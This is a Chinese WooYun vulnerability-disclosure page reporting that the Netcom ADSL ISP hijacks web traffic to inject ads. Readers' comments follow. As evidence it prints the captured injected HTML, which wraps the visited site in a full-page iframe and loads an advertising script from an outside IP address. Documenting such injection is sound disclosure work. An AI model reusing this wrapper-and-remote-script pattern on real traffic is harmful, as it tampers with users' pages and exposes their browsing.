当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0593

漏洞标题:网通adsl运营商劫持其他网站

相关厂商:网通劫持其他网站

漏洞作者: xsser

提交时间:2010-09-23 11:49

修复时间:2010-09-23 11:50

公开时间:2010-09-23 11:50

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2010-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-09-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网通通过其对网络数据传输的控制权劫持各种网站,拥有对数据的完全查看和修改能力,无任何隐私而言,今天能劫持广告,明天能做其他的任何事情!!再怎么也是北京,也不至于牛逼到如此程度吧??

详细说明:

通过重定向用户访问网站到自己的代码,运营商可以在其中添加自己的广告代码获利

漏洞证明:

<html><head><title></title><style type='text/css'>body {margin: 0px;padding: 0px;overflow:hidden;}</style></head><body><iframe id='fulliframe' name='fulliframe' src='' width='100%' height='100%' marginheight='0' marginwidth='0' frameborder='0'></iframe><script language='javascript' type='text/javascript'>var f=frames['fulliframe'];f.location=window.location;function c(){try{var d=f.document;if(d&&('complete'==d.readyState)){var t=f.document.getElementsByTagName('title')[0];document.title=t.innerHTML;}else{if(d.readyState){window.setTimeout('c()',100);}}}catch(ex){}};c();</script><script src='http://59.51.96.37/pagead/ads.js?umask=30&interval=1800&vask=3742406346&uid=1800054874&pid=72060122075721204&o_url=www.douban.com/&aname=00011310&ic=00010753&vh=00010796,337|00012404,281|00010674,212|00010774,212|00010807,193|00010753,193|00010799,125|00010737,118&al=128&ipc_type=CTN&ipc_nid=0' language='javascript' type='text/javascript'></script></body></html>


修复方案:

版权声明:转载请注明来源 xsser@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:5 (WooYun评价)

漏洞评价:

评论

  1. 2011-11-16 23:26 | Anthr@X ( 路人 | Rank:8 漏洞数:2 | Where there's a will,there's a way.)

    我也要举报!!中国组织采用威逼利诱等方式协同各ISP并且采用特殊设备对互联网正常接入进行干扰,已经触犯了新的刑法修正案第四条第四条 破坏计算机信息系统功能、数据或者应用程序,具有下列情形之一的,应当认定为刑法第二百八十六条第一款和第二款规定的“后果严重”:二)造成为五百台以上计算机信息系统提供域名解析、身份认证、计费等基础服务或者为五万以上用户提供服务的计算机信息系统不能正常运行累计一小时以上的;

  2. 2012-03-26 18:02 | liliang13 ( 路人 | Rank:3 漏洞数:1 | 这是我的城市)

    @Anthr@X 额。。谁去审呢

  3. 2012-04-12 13:29 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    电信也有下次我发 次次推销 天翼iphone fuck 还弹小窗口呢 不厚道阿

  4. 2012-05-01 11:09 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    我的广东电信从来没有小窗口,都是弹窗。。。

  5. 2012-05-02 00:30 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    我这边电信也有。超级烦人。。。

  6. 2012-08-18 18:51 | Sunny ( 路人 | Rank:0 漏洞数:1 | 本人已参加中国共产党!中国共产党是中国工...)

    我这里电信是网页打不开转到114导航然后弹出几个广告

  7. 2013-03-12 13:03 | rehd ( 路人 | Rank:0 漏洞数:1 | 搬路由器的路过)

    我们这里联通也有 :(

  8. 2013-06-09 23:10 | nyannyannyan ( 路人 | Rank:10 漏洞数:3 | 蒟蒻一枚)

    深圳电信厚道啊

  9. 2014-03-21 16:24 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    日后再说

  10. 2014-05-04 13:00 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    呵呵 真是想钱想疯了

  11. 2015-03-03 18:17 | 炮灰乙 ( 路人 | Rank:6 漏洞数:4 | 我叫路人甲,我住在中国)

    请使用https